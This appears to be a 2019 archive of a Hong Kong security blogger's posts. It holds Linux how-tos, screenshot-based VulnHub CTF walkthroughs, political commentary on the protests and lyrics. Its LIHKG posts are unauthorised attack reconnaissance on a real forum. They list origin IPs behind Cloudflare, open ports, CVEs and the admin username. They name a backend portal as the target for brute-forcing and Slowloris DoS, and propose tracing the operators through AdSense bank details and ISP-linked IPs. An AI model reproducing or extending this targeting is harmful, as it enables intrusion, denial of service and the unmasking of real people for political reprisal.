Tuesday, October 15, 2019

Avoid Lagging VirtualBox Guest With Linux

You may found Linux VirtualBox guest lagging on audio with video playback and slow performance on the whole guest. The culprit is audio driver that you even do not believe in.

Set the audio controller to "Intel HD Audio" and driver to "ALSA Audio Driver" to solve the problem on Ubuntu Host. I well tested this setting on the following environments :

(1) Ubuntu Desktop 19.04 Host with Ubuntu Desktop 19.04 Guest
(2) Ubuntu Desktop 19.04 Host with Kali Linux Rolling Guest
(3) MacOS Catalina Host with Ubuntu Desktop 19.04 Guest (CoreAudio and Intel HD Audio)

That's all! See you.


Saturday, October 12, 2019

bossplayersCTF : 1



Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF's. It should take around 30 minutes to root.

Download : https://www.vulnhub.com/entry/bossplayersctf-1,375/
Difficulty : Beginners
Format : OVA (VirtualBox)

To find the IP address of the box in the network by running nmap.

001.png

Further scan all ports of the box.

002.png

The website is running on port 80.

003.png

Check the source code of the page and found a hash at the bottom of the page.

004.png

005.png

Suspected that the hash is base64 decoded. Try to decode it.

006.png

After the decoding, the result is "workinprogress.php". Let's browse it.

007.png

The page says that "test ping command". Let's test it for "cmd" parameter.

008.png

The command is executed. To pawn a reverse shell.

009.png

To find if there is any file with sticky bit.
010.png

The result is "find". Try to privilege escalation.

011.png

012.png

Decode the "root.txt". Root is dancing!

013.png

After thought

It is a traditional Capture The Flag (CTF) box with base64 decode and sticky bit searching. Recommended.

Samiux
OSCE OSCP OSWP
October 12, 2019, China, Hong Kong


Friday, October 11, 2019

Hacker Fest 2019



The machine was part of Martin Haller workshop for Hacker Fest 2019 at Prague. There are two ways to exploit it.

Download : https://www.vulnhub.com/entry/hacker-fest-2019,378/
Difficulty : Beginners
Format : OVA (VirtualBox)

To find the IP address of the box in the network by running nmap.

s1_001.png

Further scan all ports of the box.

s1_002.png

Solution #1

There is a webmin running on port 10000 with SSL. The version is 1.890. This version is vulnerable to remote command execution by a backdoor as root (http://www.webmin.com/exploit.html).

s1_003.png

To launch Metasploit.

s1_004.png

Select "exploit/unix/webapp/webmin_backdoor".

s1_005.png

s1_006.png

Run "exploit" and got root.

s1_007.png

However, you cannot go to other directories.

s1_008.png

Run "shell" to get an interactive shell.

s1_009.png

Go to "/root" and got the "flag.txt". Root is dancing!

s1_010.png

s1_011.png

Solution #2

It is running a Wordpress site at port 80.

s2_001.png

Run "wpscan" to check. Since I do not have API token, the vulnerabilities cannot be shown.

s2_002.png

It reports "wp-google-maps" plugin is out of date. The version may be 7.10.02 as "wpscan" do not sure. This plugin may be vulnerable to SQL injection with CVE-2019-10692 (https://www.cybersecurity-help.cz/vdb/SB2019040604?affChecked=1).

s2_004.png

Launch Metasploit.

s2_005.png

Select "auxiliary/admin/http/wp_google_maps_sqli".

s2_006.png

Run "run" and got the hash of the "webmaster" account.

s2_007.png

To brute force the password of "webmaster" with "john" and "rockyou.txt". Then got the password.

s2_008.png

Then login to the box with "ssh" with the getting username and password. To privilege escalation with "sudo" and got the "flag.txt". Root is dancing!

s2_009.png

After thought

It is a real case scenario and without tricky like Capture The Flag (CTF). Recommended.

Samiux
OSCE OSCP OSWP
October 11, 2019, China, Hong Kong


Tuesday, October 08, 2019

HOWTO : Install Metasploit Framework 5.0.53 on Ubuntu Desktop 19.04

Install dependencies :

sudo apt -y install curl

Download the installer :

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod +x msfinstall


Run the installer :

./msfinstall

Initialize the msfdb :

msfdb init

or

msfdb reinit

You may need to answer two questions about setting up web version of Metasploit Framework.

Run the Metasploit Framework :

msfdb start

or

msfdb restart

msfconsole

Stop database :

msfdb stop

That's all! See you.


Sunday, September 15, 2019

Yet Another Way Of NoCloudAllowed

There are many reason to find the origin IP address of a web server. For example, to bypass cloud based DDoS protection services, to locate all the load balance servers and etc. There are a lot of methods in the net to do so as long as the cloud based serivce is misconfigured.

The most stupid way to find the origin IP address of a web server is by scanning all IP addresses in that city or service provider. It is a time consuming method and is very low efficiency. However, it is the most possible way to find the origin IP address.

In 2013, Ms Allison Nixon of Integralis gave a speech at BlackHat USA 2013 conference to introduce this method. She prepared a perl script for the PoC, namely NoCloudAllowed. The talk is at the following video.



Since her site has been down for years, the perl script is no longer available now. Her idea is presented in Python way again by Samiux in 2015 and it is modified recently (2019). It is an open source project namely Chameleon.

Chameleon simpified the idea of Allison's. It only search for a string to see if the front page in that IP address is containing or not. Chameleon scans 170,000 IP addresses in about 45 minutes with less computer resources.

However, if the site is not pointed to the root directory of the server or the site is not allowed to be accessed by IP address url, Chameleon cannot find it out. The most headache thing is that you need to guess what the origin IP address is situated in what IP range.

Reference

BlackHat 2013 - Denying Service to DDoS Protection Services
Chameleon 变色龙 - Website IP Address Seeker

That's all! See you.


Thursday, August 29, 2019

特首,請你拿起你的尚方寶劍



IMG-20190829-WA0002
random counter



827 Straight Talk 中大呂天忻





2019-08-28 時事觀察 第2節:霍詠強 -- 誠實面對自己、認真面對暴力抗爭






20190828 霍詠強

2. 誠實面對自己、認真面對暴力抗爭

不久前中國新聞社發出了一條視頻報導,內容訪問了貨車司機陳先生,他在7月21日在中環因為遭到暴徒搗亂、攔截車道時,向示威者表示不滿,卻被圍毆,新購置不久的貨 Van ,也被暴徒徹底破壞,損失十多萬元。但事後由於許多人同情陳師傅的遭遇,紛紛捐款資助,結果非但足夠彌補損失,更有剩餘的捐款,他就轉贈其他在這段期間受暴力對待的人士。他在訪問中更表示希望能和抗爭者好好討論,因為正面、負面都在一念之間!

因為這段訪問,本來想要對抗爭者好好說一說,不過,看到了暴徒如何瘋狂地攔截懸掛國旗的士,把國旗撕下丟到地上,估計和不理智者講理智比「對牛彈琴」更無用,因此還是要對自己誠實,留啖氣暖肚。

雖然,今時今日要「誠實面對自己」其實很難。政府必須對自己誠實。政府對外的態度應該更直接,因為信任已經不存在。想要和抗爭者討論?應該明白完全不可能,五大苛求、那項真接受? 何況,現世代也不需要聆聽?聽到的不一定是真的?也不一定是心裡話?該聽誰的?倒不如相信科技,用大數據分析輿情吧! 在現時的極端化社會,已經不可能平衡所有人,現實些,聽信支持者、願意相信政府的,所謂溝通平台也只對他們有作用。現實上,政府內部、決策機構、主要建制持份者,都已經離心離德,政府必須做的是要統一內部,該走的、就要送走。

應對暴力環境、要快速清場:
1.設置暴動區域警示和禁制,要求市民離開。
2.記者登記,分派能明確識別傳媒身分的衣著,是人是鬼?一目瞭然。

建制派應該衡量什麼能接受,平衡社會不是你的責任,最重要是保護好你的支持者。特別是商界,中央政府是認為有共同利益,穩定社會,如果以為可以趁亂爭權、鞏固影響力?下場會好慘。香港貧富懸殊已經好可怕,不要說瓜早就沒得摘、連草都沒多少,快寸草不生了。

平常人不能隨波逐流,最好彩香港的經濟也要倒退十年。信心很難恢復,特別是安全和穩定,需要長時間的證明,而這要付出的代價,有你一份。所以,就算不用也不想大聲叫「唔好」,最少也說明「我不認同」,也不需要爭論,其實他們明白的。除下了口罩,他們比你更軟弱。

抗爭者請不要再說什麼黑警了,因為真不合邏輯?如果真認為是黑警?還打什麼電話報警求助?集會遊行申請什麼不反對通知書?警察其實和你們追求的理想,一點關係都沒有。

好激的年輕人,現實版的 GTA 好玩,War game 好勁,保護市民很自豪,但香港真有多少人支持你?你懂嗎?為什麼不敢和父母說?以為他們不知道?家人不想撕破臉吧!敢說的,為什麼父母沒什麼反應?遊戲再好玩、也玩夠了,也不會有任何結果,命得一條,別忘記,烏克蘭到最後出現嚴重傷亡,都是遠距離暗殺的!以現時香港的司法形勢,被捕了、入罪的刑罰的確也不高,表面上也沒多少法律責任,但是,請記著,沒有多少學校、公司、國家會真心接受一個搞事的暴徒。

和理非是抗爭者當中的主流,常跟聽到說大都說保護法治?現在香港還有法治嗎? 沒有想要港獨?只想回到從前的自由法治?想清楚你要什麼?要什麼自由?要什麼民主?別再說真普選,中央政府已經失去了信任,自治權只會收緊,不會放鬆。

別再騙自己,五大苛求,到底要什麼?現在已經無法管治,那要怎样別説只要自治?當走上街説缺一不可……趕快割席吧?中文較好的,應該知道「割席斷交」這個典故,不割席意思是「同流合污」,而不是「大仁大義」。無謂再推人落火坑!

至於搞長洲革命基地、推翻政府、驅逐中國人那些朋友,沒有什麽可説了,盡快去睇醫生吧。


Wednesday, August 28, 2019

如何成為黑客 (進階篇)



你要有一件有帽的黑色外套和一個 V 剎面具。只是說笑吧了!

首先,你需要有使用 Linux 系統的經驗,因為大部份的滲透測試工具都是在 Linux 上運行。我個人認為使用現有的滲透測試 Linux 發行版本較為方便,例如 Kali Linux、Parrot Security OS、BlackArch Linux 等。再者,你亦都需要對其他的作業系統有較深入的了解和認識。

你亦需要有編程的能力,如 Python、PHP、C、JavaScript 等。因為有時遇到一些難題是需要黑客自己編寫一些脚本或程式來解決,有時又要對源碼作出審核,所以編程能力是非常重要的。

在電腦硬體方面,我建議一部比較快、內存比較多和容量較大的電腦或筆記本電腦。這部電腦亦需要有一張比較強的遊戲顯示卡,目的是用來破解密碼和哈希值等。如果要作無綫網絡滲透測試的話,你需要一個外置的,而且可以作滲透測試用的無綫網卡。要知道的是,不是所有的無綫網卡都可作滲透測試用途。

其次,你需要有一顆鍥而不捨和永不放棄的心。因為在滲透測試的過程中,並不像電影中的主角一樣順利和容易,你有可能會遇上困難,所以你不可以因為灰心而放棄。你亦需要有一顆尋根究底的心,因為你有可能會遇見一些你從未遇過的問題和情況,你要想盡法子去了解這是甚麼一回事。更重要的是,你要有一個沒有框框的思維,正所謂 Think Out Of Box。因為黑客的思維是無遠弗屆,不為既定的思維方式而有所限制。

你要有追求知識的心態,因為每天都有新的技術出現和有新的漏洞被發現,所以這類知識有如排山倒海地出現。你需要大量的時間和精力來了解及吸收這些新事物,要不斷地充實自己,古語有云 :「不進則退」。

最後,你的情緒智商亦要相當高,不會因為突然出現任何情況,而有所波動。你亦需要有撰寫報告的習慣和能力,因為每次的滲透測試都需要撰寫報告。所以要成為一名黑客並非想像中的容易。

Samiux
OSCE OSCP OSWP
寫於二零一九年八月廿八日,中國香港


2019-08-26 時事觀察 -- 余非


08262019 時事觀察第1節:余非 -- 該怎看,「香港特區政府沒作為」?




08262019 時事觀察第2節:余非 -- 他們的「革命」怎麼都「革」到保安身上了?




Thursday, August 22, 2019

2019-08-21 時事觀察 -- 霍詠強


08212019 時事觀察 第1節:霍詠強 --「香港之亂」對中國利多於害




08212019 時事觀察 第2節:霍詠強 -- 飯圈、帝吧之謎




Wednesday, August 14, 2019

【#點播】獨家專訪保護受傷人士的外國記者 Richard Scotford



Hong Kong International Airport - August 13, 2019

One visitor was attacked by over 100 rioters at Hong Kong International Airport. Later, those rioters obstructed the ambulancemen for first-aid.





Original : DotDotNews


Saturday, August 03, 2019

連登 lihkg.com 硏究與分析 (更新版本)

連登 lihkg.com 硏究與分析
(更新版本)

連登討論區近月在網上組織及散播反中國香港政府及國家的暴亂行動及訊息,而其仍然屹立不倒,不被警方或政府取替。究其原因何在呢? 我嘗試盡我綿力去研究和分析一下。

連登網站受 Cloudflare 保護,網站伺服器地址是被隱藏的。但是她的伺服器網絡地址 (IP Address) 已經被找到了。

其伺服器的供應商是 Digital Ocean,一共有兩個伺服器,其中一個是位於印度 (Bangalore, India),而網絡地址為 139.59.125.59。可以從 http://139.59.125.59 前往證實。而另一個是位於新加坡 (Singapore),而網絡地址為 206.189.86.198。可以從 http://206.189.86.198 前往證實。但印度的伺服器是主要的伺服器,另一個相信是用來作跳轉或負載平衡用途。

連登擁有多個副域名 (Subdomain),她們是 amp.lihkg.com,may-web-31.lihkg.com,www.lihkg.com 和 x.lihkg.com。除此之外,還有 lih.kg 網址。

其網頁伺服器 (Web Server) 是 Nginx,其中一個版本不詳,另一個版本為 1.12.2。她是安裝在 Linux 系統中,但其 Linux 版本也不詳。

主伺服器共有 22,80,111,3000 及 9000 五個端口 (Port) 開放。副伺服器共有 22,80,443,111及 8080 五個端口開放。

22 端口的服務為 OpenSSH 7.4,可能出現漏洞為 CVE-2018-15919 和 CVE-2017-15906。但這兩個漏洞對入侵方面,並沒有起很大的作用。

至於 443 端口在主伺服器是由 Cloudflare 提供,並可從 80 及 9000 端口跳轉。

3000 端口是一個入口,是用 React.js 編寫,從標題中估計是用來管理廣告的,而 9000 端口為 Express node.js 框架 (Framework),是網站的編程主要語言。所以,連登是由 JavaScript 編寫的。

其 3000 端口,似乎對網頁請求方面的阻斷服務攻擊免疫。9000 端口是被 Cloudflare 保護的,所以任何形式的阻斷服務攻擊都未能湊效,除非攻擊流量極之大。

而 80,443 及 9000 端口有 Cloudflare 的網頁防火牆保護。

至於副伺服器的 80,443 和 8080 端口是用來跳轉到主伺服器的。

如果在 443 端口進行網頁漏洞攻擊,難度比較高,因為有 Cloudflare 的網頁防火牆保護。況且,暫時仍未有發現在網頁上存有漏洞。

相信管理員帳戶名稱為 LIHKG。其密碼有可能是中文也不定。

如果要進一步檢視連登,是需要注册成為用戶,方可繼續進行。可是,該站需要網絡供應商、大學或大專院校的認證電郵地址方能注册成為會員。

最後,如果警方或政府可以攔截或堵塞其域名和副域名,甚至網絡地址的話,相信其黨羽並不能在短期內取得有關行動的訊息,從而減低其組織性和破壞性。

其他相關資料 :

谷歌廣告戶口是 :
Google AdSense ca-pub-3240616428100660

根據谷歌的廣告戶口,可以經谷歌追查該戶口的持有人及其銀行帳戶資料。

谷歌網站流量分析戶口是 :
Google Analytics UA-87624244-4

搜尋器指引
https://lihkg.com/robots.txt

用戶前台入口
https://lihkg.com/auth/login
https://lihkg.com/login

Samiux
OSCE OSCP OSWP
二零一九年八月三日,中國香港


最新消息 (二零一九年八月五日,中國香港)

意想不到地,連登的主持人也看我的博客。他們立即更改其虛擬私人伺服器 (VPS),認真是懦夫!我以為他們是天不怕地不怕的?!失望中!

若果大家暫時未能找到她們的網絡地址的話,不要灰心,因為其收入來源是經谷歌廣告,其谷歌廣告戶口可以追查得到其持有人。

再者,網絡地址對網站入侵作用並不大。所以將網站網絡地址隱藏,並沒有多大的意思。

其網站所使用的加密證書 (SSL Certificate) 是由 Cloudflare 提供的。伺服器並沒有自己的加密證書,所以我們會很容易繞過 Cloudflare 的防火牆。若果其網站有自己的加密證書,繞過 Cloudflare 的防火牆也亦不困難。

至於防火牆,Cloudflare 是使用改良版本的 modsecurity。其實,modsecurity 不是那麼完美的。


最新消息 (二零一九年八月六日,中國香港)

經過連日來的觀察所得,連登是一個一連串暴力和破壞事件的指揮及聯絡中心,他們會在連登上頒佈指令,提供現場實況給暴徒參考,及在資源上的調配。

他們會在連登裏公佈 Telegram「用完即棄」的谷 (Group) 方便計對特定的行動上的聯絡和指揮。但是,不是所以暴徒都知道有這個安排。他們建議所有暴徒在 Telegram 谷內隱藏電話號碼和其資料,所以有甚麼人參與那些谷,他們是不清楚的。

暴徒組織嚴謹,有攻擊小隊、偵察小隊、物資供應小隊、集會大隊等,當中也不乏戲子呢!

所以,連登創辦人「望遠」 (Profile ID 3) 等,提供平台給暴徒進行暴力襲擊事件,而不加以阻止,他們在這一連串暴力和破壞事件中是責無旁貸的。


最新消息 (二零一九年八月十一日,中國香港)

連登的論壇現在是寄存在亞馬遜雲端,而且具有電郵伺服器的功能,其主域名部份資料為 :

s1._domainkey.lihkg.com - s1.domainkey.u4005023.wl024.sendgrid.net

s2._domainkey.lihkg.com - s2.domainkey.u4005023.wl024.sendgrid.net

mandrill._domainkey.lihkg.com - "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrLHiExVd55zd/IQ/J/mRwSRMAocV/hMB3jXwaHH36d9NaVynQFYV8NaWi69c1veUtRzGt7yAioXqLj7Z4TeEUoOLgrKsn8YnckGs9i3B3tVFB+Ch/4mPhXWiNfNdynHWBcPcbJ8kjEQ2U8y78dHZj1YeRXXVvWob2OaKynO8/lQIDAQAB;"

mx._domainkey.lihkg.com - "k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDYjURk53r/mHevsulTXdxLHAguJ/I/Z+N3YwSpLutuMrNFSIpRPNUTDe1JE+ihMaa+2hY9g+b2LMDSGfO04n8FxAreJXD8RS/SxWBBL+xcIXKsgrd2PbR8S4DdNZNeHCD9OntyTbgPpNNOEuJp+0xPJ+1VfVjpDXxFzTDgdRcQiwIDAQAB"

_acme-challenge.lihkg.com - "ZHEbpsejbIDZINtxutN-VUEGe_VHUx4i5NB32ZWx6eo"

_amazonses.lihkg.com - "E4EPJITK7/pdJy4edQ6oXLZ+0R7GLVp3NG9zauUs/Qw="

lihkg.com - "google-site-verification=q9ZG1rQjq0RIDQhhszFdVuKsS01VSsDukzxpkxr0Xe4"

lihkg.com - "v=spf1 include:mailgun.org include:spf.mandrillapp.com ~all"


最新消息 (二零一九年八月廿二日,中國香港)

連豋在亞馬遜雲端的地址為 http://lihkg-demo.s3.amazonaws.com/index.html,而它是寄存在日本東京 http://lihkg-demo.s3-ap-northeast-1.amazonaws.com/index.html。相信其在 Digital Ocean 的伺服器仍然存在,只是有防火牆之類保護,不能以網絡地址存取。


最新消息 (二零一九年八月三十一日,中國香港)

今早連登聲稱被阻斷服務攻擊,其後聲稱已經採取緊急措施,所以其供手機軟體的伺服器回復正常,但網頁版不受影響,因為其網頁版是受 Cloudflare 的保護。其實它的所謂緊急措施是攔截了所有香港以外的網絡地址存取手機軟體版伺服器罷了。

參考網址 : https://lihkg.com/thread/1520611/page/1

1758 時更新

連豋現在 Cloudflare 設定為 Under Attack,它會檢查瀏覽者是否用真實的瀏覽器。所以它仍然可以以瀏覽器存取。

1812 時更新

現在相信只有 Cloudflare 的網絡地址方可用瀏覽器瀏覽。

參考網址 : https://www.cloudflare.com/ips/

1916 時更新

手機軟體伺服器現在只接受香港的網絡地址。網頁版現在取消了檢查瀏覽器方案。


最新消息 (二零一九年九月一日,中國香港)

現在連登網頁版需要輸入 reCAPTCHA 方可瀏覽,而手機軟體版本沒有此要求。再者,相信手機軟體版本伺服器只接受 Cloudflare 的網絡地址,其他的網絡地址不能存取。

可是,現在的連登已經不能同日而語了。


最新消息 (二零一九年九月五日,中國香港)

連登亦有兩個遊戲伺服器運行 Left 4 Dead 2 遊戲 2.1.5.5 版本,其開放端口為 UDP 27016,作業系統是視窗,其網絡服務供應商為香港寬頻,網絡地址分別為 123.202.166.243 及 210.6.189.36。而地圖分別為 c2m1_highway 及 c5m1_waterfront。

現在香港的執法人員是可以經香港寬頻追查得知連登的幕後主腦是誰了。

相信她還有一個網絡地址是 185.170.209.70。

Friday, August 02, 2019

连登 lihkg.com 硏究与分析

连登 lihkg.com 硏究与分析

连登讨论区近月在网上组织及散播反香港政府及国家的暴乱行动及讯息,而其仍然屹立不倒,不被警方或政府取替。究其原因何在呢? 我尝试尽我绵力去研究和分析一下。

连登网站受 Cloudflare 保护,网站伺服器地址是被隐藏的。但是她的伺服器网络地址 (IP Address) 已经被找到了。

其伺服器的供应商是 Digital Ocean,伺服器是位于印度 (Bangalore, India),而网络地址为 139.59.125.59。可以从 http://139.59.125.59 前往证实。

其网页伺服器 (Web Server) 是 Nginx,但其版本不详。她是安装在 Linux 系统中,但其 Linux 版本也不详。

其伺服器共有 22,80,111,3000 及 9000 五个端口 (Port) 开放。

22 端口的服务为 OpenSSH 7.4,可能出现漏洞为 CVE-2018-15919 和 CVE-2017-15906。

至于 443 端口是由 Cloudflare 提供,是由 80,9000 端口跳转。

3000 端口是连登网站后台入口,而 9000 端口为 Express node.js 框架 (Framework)。所以,她是由 Express.js 编写。

并且,80 及 9000 端口是跳转到 Cloudflare 的 443 端口。

其 3000 端口,有可能被 Slowloris 阻断服务攻击 (DoS),漏洞编号为 CVE-2007-6750。9000 端口是被 Cloudflare 保护的,所以 Slowloris 未能凑效。

80,443 及 9000 端口有 Cloudflare 的网页防火墙保护。

暂时的攻击面是在后台入口,就是密码爆破和阻断服务攻击。如果是 443 端口网页攻击,难度比较高,因为有 Cloudflare 的网页防火墙。

管理员帐户名称为 LIHKG。其密码有可能是中文也不定。

后台入口就是暂时的攻击面,其地址为:
http://139.59.125.59:3000

最后,其网站域名在域名伺服器 (DNS) 中,如果可以被拦截或堵塞的话,想信其党羽并不能取得有关行动的讯息,从而减低其组织性和破坏性。

其他相关资料:

谷歌广告户口是:
Google AdSense ca-pub-3240616428100660

根据谷歌的广告户口,可以经谷歌追查该户口的持有人及其银行帐户资料。

谷歌网站流量分析户口是:
Google Analytics UA-87624244-4

搜寻器指引:
https://lihkg.com/robots.txt

用户前台入口:
https://lihkg.com/auth/login
https://lihkg.com/login

Samiux
OSCE OSCP OSWP
二零一九年八月二日,中国香港


##############################################################


連登 lihkg.com 硏究與分析

連登討論區近月在網上組織及散播反香港政府及國家的暴亂行動及訊息,而其仍然屹立不倒,不被警方或政府取替。究其原因何在呢? 我嘗試盡我綿力去研究和分析一下。

連登網站受 Cloudflare 保護,網站伺服器地址是被隱藏的。但是她的伺服器網絡地址 (IP Address) 已經被找到了。

其伺服器的供應商是 Digital Ocean,伺服器是位於印度 (Bangalore, India),而網絡地址為 139.59.125.59。可以從 http://139.59.125.59 前往證實。

其網頁伺服器 (Web Server) 是 Nginx,但其版本不詳。她是安裝在 Linux 系統中,但其 Linux 版本也不詳。

其伺服器共有 22,80,111,3000 及 9000 五個端口 (Port) 開放。

22 端口的服務為 OpenSSH 7.4,可能出現漏洞為 CVE-2018-15919 和 CVE-2017-15906。

至於 443 端口是由 Cloudflare 提供,是由 80,9000 端口跳轉。

3000 端口是連登網站後台入口,而 9000 端口為 Express node.js 框架 (Framework)。所以,她是由 Express.js 編寫。

並且,80 及 9000 端口是跳轉到 Cloudflare 的 443 端口。

其 3000 端口,有可能被 Slowloris 阻斷服務攻擊 (DoS),漏洞編號為 CVE-2007-6750。9000 端口是被 Cloudflare 保護的,所以 Slowloris 未能湊效。

80,443 及 9000 端口有 Cloudflare 的網頁防火牆保護。

暫時的攻擊面是在後台入口,就是密碼爆破和阻斷服務攻擊。如果是 443 端口網頁攻擊,難度比較高,因為有 Cloudflare 的網頁防火牆。

管理員帳戶名稱為 LIHKG。其密碼有可能是中文也不定。

後台入口就是暫時的攻擊面,其地址為:
http://139.59.125.59:3000

最後,其網站域名在域名伺服器 (DNS) 中,如果可以被攔截或堵塞的話,想信其黨羽並不能取得有關行動的訊息,從而減低其組織性和破壞性。

其他相關資料:

谷歌廣告戶口是:
Google AdSense ca-pub-3240616428100660

根據谷歌的廣告戶口,可以經谷歌追查該戶口的持有人及其銀行帳戶資料。

谷歌網站流量分析戶口是:
Google Analytics UA-87624244-4

搜尋器指引:
https://lihkg.com/robots.txt

用戶前台入口:
https://lihkg.com/auth/login
https://lihkg.com/login

Samiux
OSCE OSCP OSWP
二零一九年八月二日,中國香港


Monday, July 29, 2019

香港黑白衣人事件

總編輯時間–香港黑白衣人事件





07242019時事觀察 第1節:霍詠強 -- 還原全景、真相自明





Sunday, July 28, 2019

Longjing

Longjing is deep learning driven web application firewall based on Scikit-Learn library. The following is the slide in PDF format.

sha256sum 116c66c8cb18b0cb280df0fc52425b250b17e231975f6dce50cc04fbcbbb5612 presentation-longjing.pdf

Download : presentation-longjing.pdf

That's all! See you.


Croissants

Croissants is one of my open source projects since 2012. The following is the slide in PDF format.


sha256sum 814e353abfa899aede7c6173a3dfd78b9aab0242258748f1e35073a87ff13f47 presentation-croissants.pdf

Download : presentation-croissants.pdf


That's all! See you.


Saturday, July 27, 2019

Mission Impossible?

This site is scaled down Damn Vulnerable Web Application (DVWA) which is designed for Penetration Testing purpose. It is full of vulnerabilities, such as SQL Injection (SQLi) and Cross Site Scripting (XSS). However, it is under my protection scheme and it is considered secured. You are allowed to attack it in any form except DDoS and/or Dos. Any one can hack or bypass it, please let me know and contact Samiux at freenode #infosec-ninjas.

Target : Infosec Projects.
Rule : You are allowed to attack it in any form except DDoS/DoS.
Remarks : Online time is limited.
Contact : Samiux at freenode #infosec-ninjas

That's all! See you.


Saturday, July 13, 2019

Miley Cyrus - The Backyard Sessions - "Jolene"






"Jolene"
(originally by Dolly Parton)

Jolene, Jolene, Jolene, Jolene
Oh, I'm begging of you please don't take my man
Jolene, Jolene, Jolene, Jolene
Please don't take him even though you can

Your beauty is beyond compare
With flaming locks of auburn hair
With ivory skin and eyes of emerald green

Your smile is like a breath of spring
Your skin is soft like summer rain
And I can not compete with you, Jolene

And I could easily understand
How you could easily take my man
But you don't know what he means to me, Jolene

He talks about you in his sleep
There's nothing I can do to keep
From crying, when he calls your name, Jolene, Jolene

Jolene, Jolene, Jolene, Jolene
Please don't take him even though you can
Jolene, Jolene, Jolene, Jolene
Please don't take him even though you can

I had to have this talk with you
My happiness depends on you
And whatever you decide to do, Jolene

And you could have your choice of men
But I could never love again
Cause he's the only one for me, Jolene, Jolene

Jolene, Jolene, Jolene, Jolene
Oh, I'm begging of you please don't take my man
Jolene, Jolene, Jolene, Jolene
Please don't take him even though you can
Jolene, Jolene...


Sunday, July 07, 2019

挑战不可能

18 年带出 2000 余名狙击手 高级狙击技师百步穿杨



天眼狙击手还原高难度场景 神枪手在线演绎军事大片



“猎鹰突击队” 女特警展神技



95 后 “女枪神” 郭子睿和教官李知雨合作击落动态目标 刷新个人纪录



两位女狙击手巅峰对决 现场气氛剑拔弩张



十年坦克兵挑战 270 度坦克漂移 燃爆全场



特战队员 1.70 秒 5 发子弹全部命中目标 终极挑战中角逐“极速枪王”



Friday, July 05, 2019

白帽子乎?!



二零一八年十月廿九日,廿七歲的陳子恩發現香港航空公司 (Hong Kong Airlines) 登機證的網址有敏感資料外洩 (學名為 Insecure Direct Object Reference,IDOR) 漏洞,可以任意讀取其他客戶的資料。他辯稱曾聯絡香港航空公司報告有關其漏洞,但未獲正視,所以向傳媒披露。

同日,傳媒隨即向該公司查詢,該公司職員發現陳某曾經在未獲授權的情況下讀取其中一個客戶的資料。 該公司立即報案。經調查後,陳某被控以「電訊條例」的有關罪行。

他在庭上辯護說他發現漏洞,但未被正視,如果這情況在外國,或者是白帽子的話,他就會得到獎賞,但是他卻被檢控有關罪行,覺得不公平和「司法滋擾」。 最後,陳某在二零一九年七月三日被判有罪,准以自簽一千五百港元,守行為一年了事。

現在分析和研究一下陳某是否犯法和其辯護的理由是否合理。

首先白帽子是指「道德黑客」其在書面授權的情況下進行滲透測試 (Penetrating Testing)。若果所謂的白帽子,並不在書面授權之下進行滲透測試,他就是犯法,顧名思義就是黑帽子。 至於獎賞,如果目標的公司或機構是舉行或參與獎賞計劃 (Bug Bounty) 的話,所有參與滲透測試的人員都是在書面授權的情況下操作,如果白帽子有所發現,他們就得到其應有的獎賞。

所以重點就是否在書面授權的情況下進行滲透測試。以這個案例來說,陳某並非在書面授權的情況下進行滲透測試,所以他是觸犯法例的,這情況亦包括外國的其他國家。

最後,我個人認為,陳某是輕判了!請各位不要以身試法。 所謂獎賞是非必然的。

Samiux
OSCE OSCP OSWP
二零一九年七月四日,中國香港

參考資料

東網新聞

頭條新聞

維基百科


Sunday, June 30, 2019

HOWTO : Upgrade Ubuntu 18.04.x LTS to 19.04 Directly

Upgrade Ubuntu 18.04.x LTS to 19.04 directly without via 18.10. Make sure do not upgrade it via SSH.

sudo sed -i 's/Prompt\=lts/Prompt=normal/g' /etc/update-manager/release-upgrades
sudo sed -i 's/bionic/disco/g' /etc/apt/sources.list
sudo sed -i 's/bionic/disco/g' /etc/apt/sources.list.d/*.list
sudo sed -i 's/18\.04/19.04/g' /etc/apt/sources.list.d/*.list
sudo apt update
sudo apt upgrade
sudo apt dist-upgrade
sudo apt autoclean
sudo apt autoremove


That's all! See you.


Monday, June 24, 2019

Recon Me If You Can (2019)!

Reconnaissance (Recon) is the most important phase in hacking. If you have insufficient information of the target, you cannot launch any attack on it.

Does your Intrusion Detection and Prevention System (IDPS), Firewall, Unified Threat Management System (UTM) and etc can achieve reconnaissance evasion?



That's all! See you.


Sunday, June 16, 2019

HOWTO : Solve libssl1.1 Installation Problem On Ubuntu 18.04.2 LTS

Since the current version of libssl1.1 is 1.1.1 on Ubuntu 18.04.2, the previous installed 1.1.0 may caused problem when you are upgrading or updating the system. You need to do the following to solve the problem.

ls -l /var/lib/dpkg/info | grep -i libssl

When you see both 1.1.0 and 1.1.1, you need to do the following :

sudo mv /var/lib/dpkg/info/libssl* /tmp

sudo apt-get update
sudo apt-get -y dist-upgrade
sudo apt-get -y autoclean
sudo apt-get -y autoremove


The problem should be solved.

That's all! See you.


UPDATE
Since Ubuntu has fixed the problem recently, you need to do the following to fix the missing libssl1.1.0.

sudo apt-get --reinstall -y libssl1.1.0


Monday, June 03, 2019

HOWTO : Install Keras On Nvidia Jetson Nano Developer Kit

To install JetPack 4.2 on Nvidia Jetson Nano Developer Kit, you need to follow this link.

Since JetPack 4.2 is using Ubuntu 18.04 instead of Ubuntu 18.04.2, Unity is installed by default. I prefer to uninstall Unity and get back the GNOME 3.

sudo apt update
sudo apt -y dist-upgrade
sudo apt remove unity-session unity
sudo apt install -y ubuntu-session gdm3 firefox gparted chrome-gnome-shell gnome-tweak-tool nano
sudo apt -y autoclean
sudo apt -y autoremove


Reboot the box.

If you have ownCloud :

sudo apt install -y owncloud-client

** owncloud requires you to enter password every time when boot.

To install Gnome Shell Extensions :

Harddisk LED to display the activity of the hard drive/SSD. It is recommended for this developer kit.

To set "Problem Reporting" to "Automatic" at "Privacy" of "Settings" in order to prevent unexpected popup windows.

To install Keras :

sudo apt-get install libhdf5-serial-dev hdf5-tools
sudo apt install -y python3-pip python3-dev python3-scipy
sudo apt-get install zlib1g-dev zip libjpeg8-dev libhdf5-dev

sudo pip3 install -U pip
sudo pip3 install -U numpy grpcio absl-py py-cpuinfo psutil portpicker six mock requests gast h5py astor termcolor

